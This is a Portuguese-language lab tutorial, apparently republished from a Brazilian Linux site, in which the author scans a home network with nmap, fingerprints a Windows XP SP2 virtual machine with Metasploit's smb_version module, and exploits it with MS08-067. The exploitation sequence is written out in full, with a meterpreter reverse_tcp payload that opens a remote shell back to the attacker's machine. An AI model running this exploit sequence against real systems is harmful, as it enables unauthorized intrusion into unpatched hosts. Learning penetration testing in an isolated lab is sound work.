Sei sulla pagina 1di 7

Aqui vai mais um artigo falando sobre o framework Metasploit.

Irei demonstrar algumas tcnicas simples/bsicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma mquina MS para obtermos uma shell. Let`s go??? Por: Roberto Soares (3spreto)

Comeando!
Bom galera, vamos comear!

O cenrio utilizado foi o seguinte:

* 2 VM = Sistema Operacional Windows XP SP2 com endereo IP 192.168.0.186.

Quer saber mais sobre Virtualbox? Digite "virtualbox" no campo de pesquisa aqui do VOL que encontrar timos artigos/dicas sobre o mesmo.

Scanning com Nmap e Metasploit


Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna. Abra um terminal no micro com o Backtrack e digite o seguinte comando: # nmap -v --script=smb-check-vulns 192.168.0.0/24 * -v = Modo Verbose * --script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas,

como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit. * 192.168.0.0/24 = Range de IP utilizado em minha rede local.

Se repararem, no host com endereo IP 192.168.0.186, ver que so mostradas as portas que esto abertas, e em MS08-067 est como VULNERABLE, tendo essa "simples" base, vamos atac-lo. Certo, descobrimos um host dentro da nossa LAN que est possivelmente vulnervel ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na sada. :-) Feito isto, vamos efetuar a intruso na mquina. Os comandos so os seguintes: use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso o endereo IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso o endereo IP da VM com Backtrack 4. exploit #E finalmente executamos nosso exploit. Observem a imagem abaixo.

Pronto! Ganhamos nossa shell meterpreter, ou seja, j estamos na mquina alvo. Experimente dar os comandos sysinfo e ipconfig.

Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.

Opes Metasploit
Quando executamos o comando exploit, ser realizado um "fingerprint" para a deteco do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulnerveis. Como vimos atravs do script do nmap que nosso alvo vulnervel, ns podemos realizar o processo de fingerprint e passar as especificaes corretas para o msf, assim nosso exploit no precisar realizar esta etapa, gerando possibilidades menores de erros. Certo, mas como? Vamos utilizar um mdulo auxiliar presente no Metasploit para descobrir a verso do SO, o idioma, nome da mquina e o domnio. Executaremos os seguintes comandos no console do msf: use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version. set RHOSTS 192.168.0.186 #Aqui eu setei um nico host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24. run #Comando para executar nosso scanner.

Agora j sabemos a verso certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opo set TARGET. use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso o endereo IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele o responsvel por criar a nossa comunicao entre LHOST e RHOST. set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso o endereo IP da VM com Backtrack 4. set TARGET 31 #Aqui eu digo que o alvo usa exploit #E finalmente executamos nosso exploit. Na imagem abaixo,com o comando show targets so listados todos os S.O.s vulnerveis a este exploit (ms08_067).

Veja abaixo que iremos utilizar a opo 31.

Veja o ataque agora.

Veja que no foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrar em seu destino. Ok! Finish! The end! Heheheh Ah!

isso galera, intruso simples, sendo recomendado para quem ainda est comeando com o Metasploit.

Potrebbero piacerti anche